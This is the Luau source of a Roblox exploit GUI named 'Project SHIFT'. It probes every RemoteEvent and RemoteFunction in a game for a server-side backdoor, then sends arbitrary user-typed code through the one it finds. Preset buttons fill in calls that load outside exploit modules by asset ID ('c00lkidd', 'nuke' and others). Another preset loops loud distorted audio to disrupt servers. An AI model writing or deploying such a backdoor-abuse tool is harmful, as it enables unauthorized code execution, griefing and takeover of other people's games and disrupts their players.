-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn
G2L["53"] = Instance.new("TextButton", G2L["24"]);
G2L["53"]["TextWrapped"] = true;
G2L["53"]["BorderSizePixel"] = 0;
G2L["53"]["TextSize"] = 14;
G2L["53"]["TextScaled"] = true;
G2L["53"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["53"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["53"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["53"]["BackgroundTransparency"] = 1;
G2L["53"]["Size"] = UDim2.new(0, 96, 0, 25);
G2L["53"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["53"]["Text"] = [[Inf Yield]];
G2L["53"]["Name"] = [[ScriptHubBtn]];


-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
G2L["54"] = Instance.new("LocalScript", G2L["53"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["55"] = Instance.new("UIStroke", G2L["53"]);



-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.UIStroke
G2L["56"] = Instance.new("UIStroke", G2L["53"]);
G2L["56"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.RE
G2L["57"] = Instance.new("TextButton", G2L["4"]);
G2L["57"]["TextWrapped"] = true;
G2L["57"]["RichText"] = true;
G2L["57"]["BorderSizePixel"] = 0;
G2L["57"]["TextSize"] = 14;
G2L["57"]["TextScaled"] = true;
G2L["57"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["57"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["57"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["57"]["BackgroundTransparency"] = 1;
G2L["57"]["Size"] = UDim2.new(0, 47, 0, 24);
G2L["57"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["57"]["Text"] = [[RE]];
G2L["57"]["Name"] = [[RE]];
G2L["57"]["Position"] = UDim2.new(0.75065, 0, 0, 0);


-- StarterGui.ScreenGui.Frame.RE.UIStroke
G2L["58"] = Instance.new("UIStroke", G2L["57"]);



-- StarterGui.ScreenGui.Frame.RE.UIStroke
G2L["59"] = Instance.new("UIStroke", G2L["57"]);
G2L["59"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ConsoleFrame
G2L["5a"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["5a"]["Active"] = true;
G2L["5a"]["BorderSizePixel"] = 0;
G2L["5a"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["5a"]["BackgroundColor3"] = Color3.fromRGB(150, 150, 150);
G2L["5a"]["Name"] = [[ConsoleFrame]];
G2L["5a"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["5a"]["Size"] = UDim2.new(0, 385, 0, 63);
G2L["5a"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5a"]["Position"] = UDim2.new(0, 0, 0.99273, 0);
G2L["5a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5a"]["ScrollBarThickness"] = 3;


-- StarterGui.ScreenGui.Frame.ConsoleFrame.UIStroke
G2L["5b"] = Instance.new("UIStroke", G2L["5a"]);
G2L["5b"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["5b"]["LineJoinMode"] = Enum.LineJoinMode.Miter;
G2L["5b"]["Thickness"] = 3;
G2L["5b"]["Color"] = Color3.fromRGB(53, 53, 53);


-- StarterGui.ScreenGui.Frame.ConsoleFrame.TextLabel
G2L["5c"] = Instance.new("TextLabel", G2L["5a"]);
G2L["5c"]["TextWrapped"] = true;
G2L["5c"]["BorderSizePixel"] = 0;
G2L["5c"]["TextSize"] = 14;
G2L["5c"]["TextScaled"] = true;
G2L["5c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5c"]["BackgroundTransparency"] = 1;
G2L["5c"]["Size"] = UDim2.new(0, 385, 0, 19);
G2L["5c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5c"]["Text"] = [[Output]];


-- StarterGui.ScreenGui.Frame.ConsoleFrame.UIListLayout
G2L["5d"] = Instance.new("UIListLayout", G2L["5a"]);
G2L["5d"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.ConsoleFrame.LocalScript
G2L["5e"] = Instance.new("LocalScript", G2L["5a"]);



-- StarterGui.ScreenGui.Frame.ClearLogs
G2L["5f"] = Instance.new("TextButton", G2L["4"]);
G2L["5f"]["TextWrapped"] = true;
G2L["5f"]["BorderSizePixel"] = 0;
G2L["5f"]["TextSize"] = 14;
G2L["5f"]["TextScaled"] = true;
G2L["5f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5f"]["BackgroundTransparency"] = 1;
G2L["5f"]["Size"] = UDim2.new(0, 78, 0, 32);
G2L["5f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5f"]["Text"] = [[Clear Output]];
G2L["5f"]["Name"] = [[ClearLogs]];
G2L["5f"]["Position"] = UDim2.new(0.37403, 0, 0.87282, 0);


-- StarterGui.ScreenGui.Frame.ClearLogs.UIStroke
G2L["60"] = Instance.new("UIStroke", G2L["5f"]);



-- StarterGui.ScreenGui.Frame.ClearLogs.UIStroke
G2L["61"] = Instance.new("UIStroke", G2L["5f"]);
G2L["61"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ClearLogs.LocalScript
G2L["62"] = Instance.new("LocalScript", G2L["5f"]);



-- StarterGui.ScreenGui.Frame.Toggle
G2L["63"] = Instance.new("LocalScript", G2L["4"]);
G2L["63"]["Name"] = [[Toggle]];


-- StarterGui.ScreenGui.Frame.Notify
G2L["64"] = Instance.new("LocalScript", G2L["4"]);
G2L["64"]["Name"] = [[Notify]];


-- StarterGui.ScreenGui.Frame.Min
G2L["65"] = Instance.new("TextButton", G2L["4"]);
G2L["65"]["TextWrapped"] = true;
G2L["65"]["BorderSizePixel"] = 0;
G2L["65"]["TextSize"] = 14;
G2L["65"]["TextScaled"] = true;
G2L["65"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["65"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["65"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["65"]["BackgroundTransparency"] = 1;
G2L["65"]["Size"] = UDim2.new(0, 26, 0, 24);
G2L["65"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["65"]["Text"] = [[-]];
G2L["65"]["Name"] = [[Min]];
G2L["65"]["Position"] = UDim2.new(0.68312, 0, 0, 0);


-- StarterGui.ScreenGui.Frame.Min.UIStroke
G2L["66"] = Instance.new("UIStroke", G2L["65"]);
G2L["66"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Min.LocalScript
G2L["67"] = Instance.new("LocalScript", G2L["65"]);



-- StarterGui.ScreenGui.Scanner
local function C_2()
local script = G2L["2"];
	-- LocalScript (place inside StarterPlayerScripts or StarterCharacterScripts)
	
	local Players = game:GetService("Players")
	local ReplicatedStorage = game:GetService("ReplicatedStorage")
	local StarterGui = game:GetService("StarterGui")
	local LocalPlayer = Players.LocalPlayer
	
	local screenGui = script.Parent
	local frame = screenGui:FindFirstChildOfClass("Frame")
	local username = LocalPlayer.Name
	
	-- GUI references
	local textbox = frame:FindFirstChild("Text"):FindFirstChild("TextBox")
	local executeButton = frame:FindFirstChild("Execute")
	local clearButton = frame:FindFirstChild("Clear")
	local injectButton = frame:FindFirstChild("Inject")
	local R6Button = frame:FindFirstChild("R6")
	local RE = frame:FindFirstChild("RE")
	
	-- Confirmed backdoor reference
	local confirmedBackdoor = nil
	local confirmedType = nil
	
	-- ðŸ” Full-game remote scanner
	injectButton.MouseButton1Click:Connect(function()
		local testPayload = 'local h = Instance.new("Hint") h.Parent = game.Workspace h.Text = "Project SHIFT|BEST serverside and BACKDOOR scanner"'
		local found = false
		
		for _, obj in ipairs(game:GetDescendants()) do
			if obj:IsA("RemoteEvent") or obj:IsA("RemoteFunction") then
				-- Clear existing hints
				for _, h in ipairs(workspace:GetChildren()) do
					if h:IsA("Hint") and h.Text == "Project SHIFT|BEST serverside and BACKDOOR scanner" then
						h:Destroy()
					end
				end
				
				local success = pcall(function()
					if obj:IsA("RemoteEvent") then
						obj:FireServer(testPayload)
					elseif obj:IsA("RemoteFunction") then
						obj:InvokeServer(testPayload)
					end
				end)
				
				wait(0.5)
				
				for _, h in ipairs(workspace:GetChildren()) do
					if h:IsA("Hint") and h.Text == "Project SHIFT|BEST serverside and BACKDOOR scanner" then
						print('Backdoor found: ' .. obj:GetFullName())
						confirmedBackdoor = obj
						confirmedType = obj.ClassName
						found = true
						
						pcall(function()
							StarterGui:SetCore("SendNotification", {
								Title = "Backdoor Found",
								Text = "Backdoor found: " .. obj.Name,
								Duration = 5
							})
						end)
						
						break
					end
				end
				
				if found then break end
			end
		end
		
		if not found then
			print("No backdoor found here.")
		end
	end)
	
	-- ðŸ”¥ Execute payload through confirmed backdoor
	executeButton.MouseButton1Click:Connect(function()
		local payload = textbox.Text
		if payload and payload ~= "" and confirmedBackdoor then
			pcall(function()
				if confirmedType == "RemoteEvent" then
					confirmedBackdoor:FireServer(payload)
				elseif confirmedType == "RemoteFunction" then
					confirmedBackdoor:InvokeServer(payload)
				end
			end)
		end
	end)
	
	-- ðŸ§¼ Clear textbox
	clearButton.MouseButton1Click:Connect(function()
		textbox.Text = ""
		warn("Textbox wiped clean like grandma cookies")
	end)
	
	-- ðŸ§¬ R6 conversion
	R6Button.MouseButton1Click:Connect(function()
		local payload = 'require(3436957371):r6("' .. username .. '")'
		if payload and payload ~= "" and confirmedBackdoor then
			if confirmedType == "RemoteEvent" then
				confirmedBackdoor:FireServer(payload)
			elseif confirmedType == "RemoteFunction" then
				confirmedBackdoor:InvokeServer(payload)
			end
		end
	end)
	
	-- ðŸ” Reload character
	RE.MouseButton1Click:Connect(function()
		local payload = 'game.Players.' .. username .. ':LoadCharacter()'
		if payload and payload ~= "" and confirmedBackdoor then
			if confirmedType == "RemoteEvent" then
				confirmedBackdoor:FireServer(payload)
			elseif confirmedType == "RemoteFunction" then
				confirmedBackdoor:InvokeServer(payload)
			end
		end
	end)
end;
task.spawn(C_2);
-- StarterGui.ScreenGui.Notification
local function C_3()
local script = G2L["3"];
	local StarterGui = game:GetService("StarterGui")
	local Players = game:GetService("Players")
	
	local player = Players.LocalPlayer
	local userId = player.UserId
	
	local headshotUrl = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. userId .. "&width=150&height=150&format=png"
	
	StarterGui:SetCore("SendNotification", {
		Title = "Welcome to SHIFT",
		Text = 'Welcome to Project SHIFT,' .. player.Name .. '!',
		Duration = 5,
		Icon = headshotUrl
	})
end;
task.spawn(C_3);
-- StarterGui.ScreenGui.Frame.Dragify
local function C_5()
local script = G2L["5"];
	local frame = script.Parent
	local UIS = game:GetService("UserInputService")
	
	local dragging = false
	local dragStart = nil
	local startPos = nil
	
	-- When mouse or touch begins
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = frame.Position
		end
	end)
	
	-- When mouse or touch ends
	frame.InputEnded:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = false
		end
	end)
	
	-- Update position while dragging
	UIS.InputChanged:Connect(function(input)
		if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
			local delta = input.Position - dragStart
			frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		end
	end)
end;
task.spawn(C_5);
-- StarterGui.ScreenGui.Frame.Text.LocalScript
local function C_c()
local script = G2L["c"];
	local scrollingFrame = script.Parent
	local lastY = scrollingFrame.CanvasSize.Y.Offset
	
	game:GetService("RunService").RenderStepped:Connect(function()
		local currentY = scrollingFrame.CanvasSize.Y.Offset
		
		if currentY > lastY then
			-- Expansion detected, scroll to bottom once
			scrollingFrame.CanvasPosition = Vector2.new(0, currentY)
			lastY = currentY
		end
	end)
end;
task.spawn(C_c);
-- StarterGui.ScreenGui.Frame.Text.TextBox.LocalScript
local function C_13()
local script = G2L["13"];
	local textBox = script.Parent
	local parent = textBox.Parent
	local textLabel = parent:FindFirstChild("TextLabel")
	
	local function updateLineNumbers()
		if not textLabel then return end
		
		local lines = string.split(textBox.Text, "\n")
		local numberedLines = {}
		
		for i = 1, #lines do
			table.insert(numberedLines, tostring(i))
		end
		
		textLabel.Text = table.concat(numberedLines, "\n")
	end
	
	textBox:GetPropertyChangedSignal("Text"):Connect(updateLineNumbers)
	
	updateLineNumbers()
end;
task.spawn(C_13);
-- StarterGui.ScreenGui.Frame.Text.TextBox.Completor
local function C_14()
local script = G2L["14"];
	local textBox = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	local runService = game:GetService("RunService")
	
	local tooltip
	local memorizedKeywords = {}
	
	-- Keyword groups with colors
	local keywordGroups = {
		[Color3.fromRGB(170, 0, 65)] = { -- red
			"return", "function", "local", "if", "else", "error", "end", "elseif", "break"
		},
		[Color3.fromRGB(255, 255, 0)] = { -- yellow
			":Connect", ":IsA", ":GetPropertyChangedSignal", ":FindFirstChild()", ":FindFirstAncestor()",
			":FindFirstAncestorOfClass()", ":WaitForChild()", ":LoadCharacter()", ":GetPropertyChangedSignal", "Clear()", "ClearAllChildren()"
		},
		[Color3.fromRGB(0, 0, 255)] = { -- blue
			"require", "game", "script", "print", "loadstring",
			"game.Workspace", "game.Players", "game.Lighting", "game.ReplicatedStorage", "game.ReplicatedFirst",
			"game.ServerScriptService", "game.ServerStorage", "game.StarterGui", "game.StarterPack", "game.StarterPlayer",
			"game.SoundService", "game.Chat", "game.LocalizationService", "game.MarketplaceService", "game.HttpService",
			"game.UserInputService", "game.ContextActionService", "game.RunService", "game.TweenService", "game.PathfindingService",
			"game.InsertService", "game.TestService", "game.VirtualInputManager", "game.VRService", "game.MessagingService",
			"game.NotificationService", "game.SocialService", "game.DataStoreService", "game.MemoryStoreService", "game.AssetService",
			"game.AdService", "game.AnalyticsService", "game.ScriptContext", "game.Selection", "game.GuiService", "game.InputService",
			"game.KeyframeSequenceProvider", "game.NavigationService", "game.Terrain", "game.Teams", "game.CollectionService",
			"game.ContentProvider", "game.Stats", "game.SoundscapeService", "game.ThumbnailGenerator", "game.TranslationService",
			"game.VoiceChatService", "game.ProximityPromptService", "game.TextChatService", "game.MaterialService",
			"game.FaceAnimatorService", "game.AnimationClipProvider", "game.AssetManagerService", "game.PluginDebugService",
			"game.StudioData", "game.StudioService", "game.SelectionService", "game.ToolboxService", "game.Draggers",
			"game.TemporaryScriptService"
		}
	}
	
	local memoryColor = Color3.fromRGB(158, 158, 158) -- TLK88 orange for memorized locals
	
	local function createTooltip(text, color)
		if tooltip then tooltip:Destroy() end
		
		tooltip = Instance.new("TextLabel")
		tooltip.Text = text
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = color
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 200, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = textBox:FindFirstAncestorOfClass("ScreenGui")
		
		local connection
		connection = runService.RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end
	
	local function destroyTooltip()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end
	
	local function scanMemory(text)
		if text == "" then
			table.clear(memorizedKeywords)
			return
		end
		
		for var in string.gmatch(text, "local%s+([%w_]+)%s*=") do
			memorizedKeywords[var] = true
		end
		
		for func in string.gmatch(text, "local%s+function%s+([%w_]+)") do
			memorizedKeywords[func] = true
		end
		
		for name in pairs(memorizedKeywords) do
			if not string.find(text, name) then
				memorizedKeywords[name] = nil
			end
		end
	end
	
	local function isInsideDeclaration(text)
		local lines = string.split(text, "\n")
		local lastLine = lines[#lines] or ""
		
		if string.match(lastLine, "^%s*local%s+function%s+[%w_]*$") then return true end
		if string.match(lastLine, "^%s*local%s+[%w_]*$") then return true end
		if string.match(lastLine, "^%s*local%s+[%w_]+%s*=%s*$") then return true end
		
		return false
	end
	
	local function updateTooltip()
		local text = textBox.Text
		local lastWord = string.match(text, "[%w_:%.%(%)]+$")
		
		scanMemory(text)
		
		if not lastWord or #lastWord == 0 or isInsideDeclaration(text) then
			destroyTooltip()
			return
		end
		
		for color, group in pairs(keywordGroups) do
			for _, keyword in pairs(group) do
				if string.sub(keyword, 1, #lastWord):lower() == lastWord:lower() then
					createTooltip(keyword, color)
					return
				end
			end
		end
		
		for name in pairs(memorizedKeywords) do
			if string.sub(name, 1, #lastWord):lower() == lastWord:lower() then
				createTooltip(name, memoryColor)
				return
			end
		end
		
		destroyTooltip()
	end
	
	textBox:GetPropertyChangedSignal("Text"):Connect(updateTooltip)
	textBox.MouseLeave:Connect(destroyTooltip)
end;
task.spawn(C_14);
-- StarterGui.ScreenGui.Frame.Text.TextBox.LocalScript
local function C_15()
local script = G2L["15"];
	script.Parent.Text = 'print("Project SHIFT SS")'
end;
task.spawn(C_15);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_20()
local script = G2L["20"];
	script.Parent.MouseButton1Click:Connect(function()
		warn("Trying to inject...")
	end)
end;
task.spawn(C_20);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_28()
local script = G2L["28"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(14125553864):Fire("' .. game.Players.LocalPlayer.Name .. '","c00lkidd")'
	end)
end;
task.spawn(C_28);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_2c()
local script = G2L["2c"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(3010581956):Fireplace("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_2c);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_30()
local script = G2L["30"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(7192763922).load("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_30);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_34()
local script = G2L["34"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(15267263357).V11("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_34);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_38()
local script = G2L["38"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(78790302691160):Hload("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_38);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_3c()
local script = G2L["3c"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(12350030542).RC7("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_3c);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_40()
local script = G2L["40"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(10868847330):pls("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_40);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_44()
local script = G2L["44"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(17776365113).kj("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_44);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_48()
local script = G2L["48"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(135686792632620).nuke("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_48);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_4c()
local script = G2L["4c"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(116621687717356):Pload("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_4c);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_50()
local script = G2L["50"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = [[local SoundService = game:GetService("SoundService")
		
	-- Sound IDs
		local soundIds = {
			82706813987936,
			76279547029713,
			135763933956435
		}
		
	-- Create and configure sounds
		local sounds = {}
		
	for _, id in ipairs(soundIds) do
		local sound = Instance.new("Sound")
		sound.SoundId = "rbxassetid://" .. id
		sound.Volume = 10
		sound.PlaybackSpeed = 0.2
			
	-- Add distortion effect (level 0.9)
		local distortion = Instance.new("DistortionSoundEffect")
		distortion.Level = 0.5
		distortion.Parent = sound
			
		sound.Parent = SoundService
		table.insert(sounds, sound)
	end
		
	-- Function to play sounds in sequence
		local function playSequence()
			while true do
				for _, sound in ipairs(sounds) do
					sound:Play()
					sound.Ended:Wait()
				end
			end
		end
		
	-- Start the loop
	playSequence()
	]]
	end)
end;
task.spawn(C_50);
-- StarterGui.ScreenGui.Frame.ScrollingFrame.ScriptHubBtn.LocalScript
local function C_54()
local script = G2L["54"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("Text"):FindFirstChild("TextBox").Text = 'require(7634392335)("' .. game.Players.LocalPlayer.Name .. '")'
	end)
end;
task.spawn(C_54);
-- StarterGui.ScreenGui.Frame.ConsoleFrame.LocalScript
local function C_5e()
local script = G2L["5e"];
	local scrollingFrame = script.Parent
	local LogService = game:GetService("LogService")
	
	-- Format time
	local function getTimeStamp()
		local t = os.date("*t")
		return string.format("%02d:%02d:%02d", t.hour, t.min, t.sec)
	end
	
	-- Create a new label for each log line
	local function addLogLine(text, color)
		local label = Instance.new("TextLabel")
		label.Name = "LOG"
		label.Text = text
		label.TextColor3 = color
		label.BackgroundTransparency = 1
		label.Font = Enum.Font.Code
		label.TextSize = 14
		label.TextWrapped = true
		label.Size = UDim2.new(1, -10, 0, 0)
		label.AutomaticSize = Enum.AutomaticSize.Y
		label.Parent = scrollingFrame
	end
	
	-- Listen to all console output
	LogService.MessageOut:Connect(function(message, messageType)
		local timestamp = getTimeStamp()
		local color = Color3.fromRGB(255, 255, 255)
		
		if messageType == Enum.MessageType.MessageWarning then
			color = Color3.fromRGB(255, 217, 0)
		elseif messageType == Enum.MessageType.MessageError then
			color = Color3.fromRGB(179, 0, 0)
		end
		
		local fullText = "[" .. timestamp .. "] " .. message
		addLogLine(fullText, color)
	end)
end;
task.spawn(C_5e);
-- StarterGui.ScreenGui.Frame.ClearLogs.LocalScript
local function C_62()
local script = G2L["62"];
	local button = script.Parent
	local scrollingFrame = button.Parent:FindFirstChild("ConsoleFrame")
	
	button.MouseButton1Click:Connect(function()
		if scrollingFrame then
			for _, child in ipairs(scrollingFrame:GetChildren()) do
				if child:IsA("TextLabel") and child.Name == "LOG" then
					child:Destroy()
				end
			end
		end
	end)
end;
task.spawn(C_62);
-- StarterGui.ScreenGui.Frame.Toggle
local function C_63()
local script = G2L["63"];
	local frame = script.Parent
	local UserInputService = game:GetService("UserInputService")
	
	UserInputService.InputBegan:Connect(function(input, gameProcessed)
		if input.KeyCode == Enum.KeyCode.K and not gameProcessed then
			local focused = UserInputService:GetFocusedTextBox()
			if not focused then
				frame.Visible = not frame.Visible
			end
		end
	end)
end;
task.spawn(C_63);
-- StarterGui.ScreenGui.Frame.Notify
local function C_64()
local script = G2L["64"];
	local frame = script.Parent
	local StarterGui = game:GetService("StarterGui")
	local RunService = game:GetService("RunService")
	
	local notified = false
	
	RunService.Heartbeat:Connect(function()
		if not frame.Visible and not notified then
			notified = true
			StarterGui:SetCore("SendNotification", {
				Title = "SS Hidden",
				Text = "Press K to show the GUI.",
				Duration = 3
			})
		end
		
		if frame.Visible then
			notified = false
		end
	end)
end;
task.spawn(C_64);
-- StarterGui.ScreenGui.Frame.Min.LocalScript
local function C_67()
local script = G2L["67"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
	end)
end;
task.spawn(C_67);

return G2L["1"], require;
